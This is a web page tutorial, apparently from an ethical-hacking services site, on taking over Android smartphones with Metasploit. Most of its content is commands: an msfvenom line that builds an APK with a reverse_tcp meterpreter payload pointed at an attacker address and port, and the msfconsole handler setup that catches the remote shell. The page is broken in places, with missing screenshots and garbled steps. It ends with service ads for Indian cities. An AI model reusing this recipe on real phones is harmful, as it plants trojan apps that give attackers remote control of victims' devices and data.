![]() |
In world all are used smartphone. |
Why We Use kali?
Android is an operating system based on the Linux kernel, and designed primarily for touch screen mobile devices such as smartphones and tablet computers. |
Let’s Start Our Tutorial |
Requirements:
|
Here is some important information for this tutorial:
Attacker IP address: 192.168.1.5( here you use your ip Address) Attacker port to receive connection: 4444 |
Step by Step Hacking Android Smartphone using Metasploit: – |
There are many tutorials on internet for android hacking by using Metasploit. But metasploit change their commands MSFVenom Replace msfpayload |
|
msfvenom -p android/meterpreter/reverse_tcp LHOST= 192.168.1.5 LPORT=4444 R >/root/any nameof yourfile.apk |
|
below is our screenshot when executed the command |
![]() |
3.Now Anroid App Ready to Attack.then Type msfconsole to go to Metasploit console. |
![]() |
Type Payload same with step2: |
use exploit/multi/handler –> we will use Metasploit handler set payload android/meterpreter/reverse_tcp –> make sure the payload |
4. The next step we need to configure the switch for the Metasploit payload we already specified in step 3. |
set lhost 192.168.1.5 –> attacker IP address |
![]() |
|
![]() |
Only Education Purpose* |
We Provide Services On Following Cities |
|||||
*Ethical Haker in Ludhiana | *Ethical Hacking Services in Amritsar | *Ethical Hacking Services in Mumbai | |||
|